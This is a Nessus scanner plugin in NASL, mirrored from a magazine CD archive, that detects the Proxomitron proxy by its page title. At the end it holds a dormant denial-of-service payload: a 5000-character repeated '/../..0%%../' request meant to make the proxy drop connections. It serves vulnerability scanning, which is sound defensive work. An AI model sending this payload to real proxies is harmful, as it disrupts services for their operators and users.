home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / proxomitron_dos.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  86 lines

  1. #
  2. # This script is (C) Tenable Network Security
  3. #
  4.  
  5.  
  6.  
  7.  
  8. if(description)
  9. {
  10.  script_id(11752);
  11.  script_bugtraq_id(7954);
  12.  script_version ("$Revision: 1.4 $");
  13.  
  14.  name["english"] = "Proxomitron DoS";
  15.  
  16.  script_name(english:name["english"]);
  17.  
  18.  desc["english"] = "
  19. The remote host is running the Proxomitron proxy. There might be a bug
  20. in this software which may allow an attacker to disable it remotely.
  21.  
  22. *** Nessus did not check for the presence of the flaw, so this might
  23. *** be a false positive.
  24.  
  25.  
  26. Solution : Disable this service
  27. Risk factor : Medium";
  28.  
  29.  
  30.  
  31.  
  32.  script_description(english:desc["english"]);
  33.  
  34.  summary["english"] = "Checks for the presence of proxomitron";
  35.  
  36.  script_summary(english:summary["english"]);
  37.  
  38.  script_category(ACT_ATTACK);
  39.  
  40.  
  41.  script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security",
  42.         francais:"Ce script est Copyright (C) 2003 Tenable Network Security");
  43.  family["english"] = "Denial of Service";
  44.  script_family(english:family["english"]);
  45.  script_dependencie("find_service.nes");
  46.  script_require_ports("Services/www", 8080);
  47.  exit(0);
  48. }
  49.  
  50. #
  51. # The script code starts here
  52. #
  53.  
  54.  
  55. include("http_func.inc");
  56. include("http_keepalive.inc");
  57.  
  58. port = get_http_port(default:8080);
  59. if(!get_port_state(port))exit(0);
  60.  
  61.  
  62. if ( 1 || safe_checks() )
  63. {
  64.  req = http_get(item:"/", port:port);
  65.  res = http_keepalive_send_recv(port:port, data:req);
  66.  if ( res == NULL ) exit(0);
  67.  
  68.  if( "<title>The Proxomitron Reveals...</title>" >< res )
  69.  {
  70.   security_warning(port:port, data:report);
  71.   exit(0);
  72.  }
  73. }
  74.  
  75. #
  76. # the following makes proxomitron close the connection abruptely, 
  77. # however it's false positive prone so it's disabled.
  78. #
  79.  
  80. req = http_get(item:crap(data:"/../..0%%../", length:5000), port:port);
  81. soc = http_open_socket(port);
  82. if( !soc ) exit(0);
  83. send(socket:soc, data:req);
  84. res = http_recv(socket:soc);
  85. close(soc);
  86.